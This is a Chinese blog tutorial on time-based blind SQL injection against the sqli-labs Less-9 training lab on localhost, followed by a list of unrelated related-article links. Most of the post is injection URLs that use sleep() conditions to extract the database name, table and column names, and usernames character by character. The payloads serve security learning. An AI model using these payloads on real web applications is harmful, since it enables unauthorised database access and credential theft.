sql盲注之延遲注入的用法

原創 珉學 2018-09-18 02:25

1. 查看數據庫長度

   http://127.0.0.1/sqli-labs-master/Less-9/?id=1' AND if(length(database())>7,sleep(5),1)-- +

 image.png

http://127.0.0.1/sqli-labs-master/Less-9/?id=1' AND if(length(database())>8,sleep(5),1)-- +

 image.png

2. 查看數據庫第一個個字符

http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and  if(ascii(substr( database(),1,1) )>114,sleep(5),1)-- +

 image.png

http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and if(ascii(substr( database(),1,1) )>115,sleep(5),1)-- +

 image.png

第二個字符

http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and if(ascii(substr( database(),2,1) )>101,sleep(5),1)-- +

 image.png

http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and if(ascii(substr( database(),2,1) )>100,sleep(5),1)-- +

 image.png

獲得數據庫

 image.png

3. 獲得表名長度

   第一個表的長度

http://127.0.0.1/sqli-labs-master/Less-9/?id=1' AND if(length((select table_name from information_schema.tables where table_schema='security' limit 0,1))>5,sleep(5),1)-- +

 image.png

http://127.0.0.1/sqli-labs-master/Less-9/?id=1' AND if(length((select table_name from information_schema.tables where table_schema='security' limit 0,1))>6,sleep(5),1)-- +

 image.png

   第二個表的長度

 http://127.0.0.1/sqli-labs-master/Less-9/?id=1' AND if(length((select table_name from information_schema.tables where table_schema='security' limit 1,1))>8,sleep(5),1)-- +

 image.png

http://127.0.0.1/sqli-labs-master/Less-9/?id=1' AND if(length((select table_name from information_schema.tables where table_schema='security' limit 1,1))>7,sleep(5),1)-- +

 image.png

4. 查看第一個表的第一個字符

 http://127.0.0.1/sqli-labs-master/Less-9/?id=1 ' AND if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>100,sleep(5),1) --+

 image.png

http://127.0.0.1/sqli-labs-master/Less-9/?id=1 ' AND if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>101,sleep(5),1) --+

 image.png

第一個表的第二個字符

http://127.0.0.1/sqli-labs-master/Less-9/?id=1 ' AND if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),2,1))>109,sleep(5),1) --+

 image.png

http://127.0.0.1/sqli-labs-master/Less-9/?id=1 ' AND if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),2,1))>108,sleep(5),1) --+

 image.png

5. 查看第二個表的第一個字符

  http://127.0.0.1/sqli-labs-master/Less-9/?id=1 ' AND if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 1,1),1,1))>114,sleep(5),1) --+

 image.png

http://127.0.0.1/sqli-labs-master/Less-9/?id=1 ' AND if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 1,1),1,1))>113,sleep(5),1) --+

 image.png

第二個表的第二個字符

  http://127.0.0.1/sqli-labs-master/Less-9/?id=1 ' AND if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 1,1),2,1))>101,sleep(5),1) --+ 

image.png

http://127.0.0.1/sqli-labs-master/Less-9/?id=1 ' AND if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 1,1),2,1))>100,sleep(5),1) --+

 image.png

查看第四個表的第一個字符

http://127.0.0.1/sqli-labs-master/Less-9/?id=1 ' AND if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 3,1),1,1))>117,sleep(5),1) --+

 image.png

http://127.0.0.1/sqli-labs-master/Less-9/?id=1 ' AND if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 3,1),1,1))>116,sleep(5),1) --+

 image.png

最後獲得的表有

 image.png

6. 查看users表的長度

  http://127.0.0.1/sqli-labs-master/Less-9/?id=1' AND if(length((select column_name from information_schema.columns where table_name='users' limit 0,1))>7,sleep(5),1) --+  

 image.png

http://127.0.0.1/sqli-labs-master/Less-9/?id=1' AND if(length((select column_name from information_schema.columns where table_name='users' limit 0,1))>6,sleep(5),1) --+   

 image.png

7. 查看users表中列的長度

    第一列的第一個字符

  http://127.0.0.1/sqli-labs-master/Less-9/?id=1 ' AND if(ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1))>117,sleep(5),1) --+

 image.png

http://127.0.0.1/sqli-labs-master/Less-9/?id=1 ' AND if(ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1))>116,sleep(5),1) --+

 image.png

第二列的第一個字符

http://127.0.0.1/sqli-labs-master/Less-9/?id=1 ' AND if(ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),2,1))>112,sleep(5),1) --+

 image.png

http://127.0.0.1/sqli-labs-master/Less-9/?id=1 ' AND if(ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),2,1))>111,sleep(5),1) --+

 image.png

獲得列表爲:usernamepassword

8. users中用戶名的長度。

  http://127.0.0.1/sqli-labs-master/Less-9/?id=1 ' AND if(length((select username from users limit 0,1))=4,sleep(5),1) -- +

 image.png

第一個用戶名的第一個字符

 http://127.0.0.1 /sqli-labs-master/Less-9/?id=1 ' AND if(ascii(substr((select username from users limit 0,1),1,1))>68,sleep(5),1) --+

 image.png

http://127.0.0.1 /sqli-labs-master/Less-9/?id=1 ' AND if(ascii(substr((select username from users limit 0,1),1,1))>67,sleep(5),1) --+

 image.png

最後獲得用戶名密碼是:Dump


發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章

SQL盲注

夜人安靜 2019-01-04 13:11:13

natas15 題解

lyover 2018-08-22 14:32:57

natas16 題解

lyover 2018-08-22 14:32:57

美團面試:說說Netty的零拷貝技術?

零拷貝技術(Zero-Copy)是一個大家耳熟能詳的技術名詞了,它主要用於提升 IO(Input & Output)的傳輸性能。 那麼問題來了,爲什麼零拷貝技術能提升 IO 性能? 1.零拷貝技術和性能 在傳統的 IO 操作中,當我們需要讀

Java中文社羣 2024-06-07 14:39:30

2024 Web 新特性 - 使用 Popover API 創建彈窗

Popover API 爲開發者提供了一種聲明式的方式來創建各種類型的彈窗。目前已在所有三大瀏覽器引擎中可用,並正式成爲 Baseline 2024 的一部分。 一直以來,我們在實現彈出式菜單、提示框或信息卡片時,往往依賴於各種JavaSc

劉漢貴 2024-06-07 14:33:29

開發視頻會議系統:使用GPU解碼渲染視頻

      現在,使用視頻會議系統遠程協同辦公、溝通交流,已經非常普遍了。如果我們要開發自己的視頻會議系統,那麼,GPU解碼渲染技術是不可缺少的。       在視頻會議系統中,經常需要同時觀看會議中多個參會人員的視頻圖像,另外,還可能需要

zhuweisky 2024-06-07 14:33:09

C#/.NET/.NET Core優秀項目和框架2024年5月簡報

前言 公衆號每月定期推廣和分享的C#/.NET/.NET Core優秀項目和框架(每週至少會推薦兩個優秀的項目和框架當然節假日除外),公衆號推文中有項目和框架的介紹、功能特點、使用方式以及部分功能截圖等(打不開或者打開GitHub很慢的同

追逐時光 2024-06-07 14:28:29

計劃做點事情-還是跳槽

【最近想做什麼了】 和之前一樣,模板還是跳槽 【爲什麼要做這個】 和之前一樣,但是還是想再寫一遍 現在的工作,錢少事多離家遠 現在的自己,人窮有家要搞錢 【要在什麼時間達到什麼樣的目標,分段計劃是怎樣的】 目前可信考試是過了, 太簡單了,算

eonie 2024-06-07 14:26:39

好久沒來了-20240607

【今天又是什麼日子】 今天是2024年6月7日,星期五,其實也沒有很特別 只不過剛好是今年高考的第一天,寫這個的時候上午的考試應該完了 高考很重要,每一天都很重要 年輕很好,每一天也很好 且行且珍惜 【上次來是什麼時候】 上次來還是上個月月

eonie 2024-06-07 14:26:39

vscode win11 配置go

官網安裝後, vscode會自動識別. 右下角選go.(不能選go module) 然後安裝go插件.之後運行即可. 如果自動安裝delve啥的出錯. 就先自己配置. go env -w GOPROXY=https://goproxy.cn

張博的博客 2024-06-07 14:26:29

構建Arm版jdk1.8 docker基礎鏡像

前言 jdk1.8的docker鏡像默認是cpu架構爲x64的,在arm架構或者aarch64 上運行java應用需要自己構建一個對應cpu架構的jdk基礎鏡像 過程 首先去Oracle官網下載對應的Arm架構的1.8版本jdk 下載好後

M_mxy 2024-06-07 14:23:19

微軟RPA工具Power Automate Desktop

什麼是RPA RPA(機器人流程自動化)系統是一種應用程序,它通過模仿用戶在電腦上的操作方法, 實現自動化操作流程, 協助人在計算機、手機等計算設備中完成重複的工作流任務。 Power Automate Desktop 2021年3月2日

2018 2024-06-07 14:20:58

Power Automate Desktop 安裝完,登錄後老是提示one driver 錯誤

Power Automate Desktop  安裝完,登錄後老是提示one driver 錯誤

2018 2024-06-07 14:20:58

在線課䟫

https://www.edx.org/edxchina   https://www.coursera.org/   https://www.xuetangx.com/search?query=%E9%83%91%E6%AF%93%E7%

2018 2024-06-07 14:20:58

高分通過RPA高級認證

 

2018 2024-06-07 14:20:58